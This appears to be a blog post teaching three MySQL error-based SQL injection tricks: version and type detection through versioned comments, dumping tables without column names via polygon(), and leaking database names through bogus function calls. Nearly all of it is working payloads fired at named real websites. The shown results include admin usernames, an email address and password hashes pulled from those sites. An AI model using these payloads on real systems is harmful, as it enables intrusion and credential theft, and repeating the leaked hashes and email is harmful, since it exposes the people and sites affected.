Cool Tricks Of SQL injection

in this trick, we will be using c-style comments, to know what version we are dealing with.
we will be using error 1064.
a little reminder-
the number in /*!50000*/ represents the version.
if the number is higher than the version itself, it will consider as comment.
the real problem with "one shot", is that we dont know if the injection type is integer or string.
but as we saw on ABIOS, it dosent really matter.
lets check this syntax-
Code:
-- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
lets say we have a site with version 4.1.22.

id=1 -- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/

first off, the string/integer dosent matter, because of the -- '%0a.
if its string, the injection would be-
Code:
id='1 -- '%0a syntax
if its integer-
Code:
id=1 -- '%0a syntax
the query will get executed no matter what.
and now for the version part.
the red part will consider as comment, because the version is lower than 5 and 6.
the green part will not consider as comment, and the blue part will dissapear, because of the <!, and we will see-
1064: version=4.

demos-
Code:
http://www.djinsure.com/faq/viewFAQ.php?id=8 -- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
1064: version=5
Code:
http://bridgeyear.com/general.php?id=33 -- '%0a /*!60000 version=6<!*/ /*!50000 version=5<!*/ /*!40000 version=4<!*/ /*!30000 version=3<!*/
1064: version=4

another cool thing we can do, is knowing if its integer or string.
lets check that-
Code:
/*!60000 integer version=6<!*/ /*!50000 integer version=5<!*/ /*!40000 integer version=4<!*/ /*!30000 integer version=3<!*/  ' /*!60000 string version=6<!*/ /*!50000 string version=5<!*/ /*!40000 string version=4<!*/ /*!30000 string version=3<!*/

Code:
http://www.djinsure.com/faq/viewFAQ.php?id=8 /*!60000 integer version=6<!*/ /*!50000 integer version=5<!*/ /*!40000 integer version=4<!*/ /*!30000 integer version=3<!*/  ' /*!60000 string version=6<!*/ /*!50000 string version=5<!*/ /*!40000 string version=4<!*/ /*!30000 string version=3<!*/
1064: string version=5
Code:
http://bridgeyear.com/general.php?id=33 /*!60000 integer version=6<!*/ /*!50000 integer version=5<!*/ /*!40000 integer version=4<!*/ /*!30000 integer version=3<!*/  ' /*!60000 string version=6<!*/ /*!50000 string version=5<!*/ /*!40000 string version=4<!*/ /*!30000 string version=3<!*/
1064: integer version=4

and we got the version and the type in one request

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
trick #2::
In trick #2, i will show you some trick to get the data without write the column names.
we will be using polygon().
things we need-
* version 5.1+
* mysql_error on.

im not gonna explain every detail, im gonna show you the queries and explain why its working.
in sql, to get the whole table content we using-
Code:
SELECT * FROM table;
lets try on polygon()-
Code:
http://www.soarland.com/CF_Card_Adapter-catalog-41 and polygon((select * from(select * from C277915_shledlights.snh_base_admin)p)).html
Operand should contain 1 column(s)

the way to bypass that is very simple.
Code:
http://www.soarland.com/CF_Card_Adapter-catalog-41 and polygon((select 1 from(select * from C277915_shledlights.snh_base_admin)p)).html
(select '3' AS `id`,'admin' AS `user`,'9ba17d7d1ca40550ae551586a6ba612e' AS `password`,'管理员' AS `name`,'管理员' AS `job`,'A001' AS `jobid`,'0' AS `moveable`

we got the data and the column names, lets make some order.
column: id , user, password, name, job, jobid, moveable
data: 3 , admin , 9ba17d7d1ca40550ae551586a6ba612e , 管理员 , 管理员 , A001 , 0.

the problem is its so easy for community-logs.
in other versions, we gotta outsmart this error.
lets take this site for example, not community-log
Code:
http://diversicare.ca/home/ind_comm.php?cid=73 and polygon((select 1 from(select * from siteadmin)x))
we can only see the column names.
this happend because we still stuck at the server layer.
to overpower that, we can use a small trick to travel from the server layer to output layer.
we will take our query, and compare it to the same query, to bypass that "Operand should contain x column(s)".
Code:
http://diversicare.ca/home/ind_comm.php?cid=73 and polygon((select * from(SELECT ((SELECT * from (select * from siteadmin limit 0,1)x) = (select*from siteadmin limit 1) )``)o))
(select 'Diviersicare','kkotanko@diversicare.ca','admin','$1$V7K1PDVx$.P98zhzs/1O/tnbgWwkyX1','2013-09-06','siteowner' from dual)
Code:
http://diversicare.ca/home/ind_comm.php?cid=73 and polygon((select * from(SELECT ((SELECT * from (select * from siteadmin limit 1,1)x) = (select*from siteadmin limit 1) )``)o))
(select 'SEO Admin','','seoadmin','$1$4jaY6JWQ$DmDTHqJORIEukx30cOb6b0','0000-00-00','seodev' from dual)

and thats the new generation injection, get the data without even write the column names.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

trick #3::
in this this, i will show you a quick trick to get the db name without using letters or numbers.

i will use the v() method.
the v() method is basically write a false function name, to get this error-
FUNCTION database.v dose not exist

example-
Code:
http://www.thornbridgebrewery.co.uk/shop.php?catid=2'or v()-- -
FUNCTION neonsix_thornbridge.v does not exist

db = neonsix_thornbridge.
but we want it without using letters, so we gotta get rid of "or" and "v".
the usage of "or" here is not really OR, is just to connect between the false function to the query.
so, we can use * instead.
* is multiply, and when we multiply by our false function, we get an error.
to replace the "v", we can use _ or $.
so-
Code:
http://www.thornbridgebrewery.co.uk/shop.php?catid=2'*_()%23
FUNCTION neonsix_thornbridge._ does not exist

in case its integer, we can simply write our false function instead of the parameter value.
Code:
http://www.cmc.net.pk/gen_cmc.php?id=_()

other combinations-
Code:
_()
$()
`@`()
`anything`()

Post a Comment

أحدث أقدم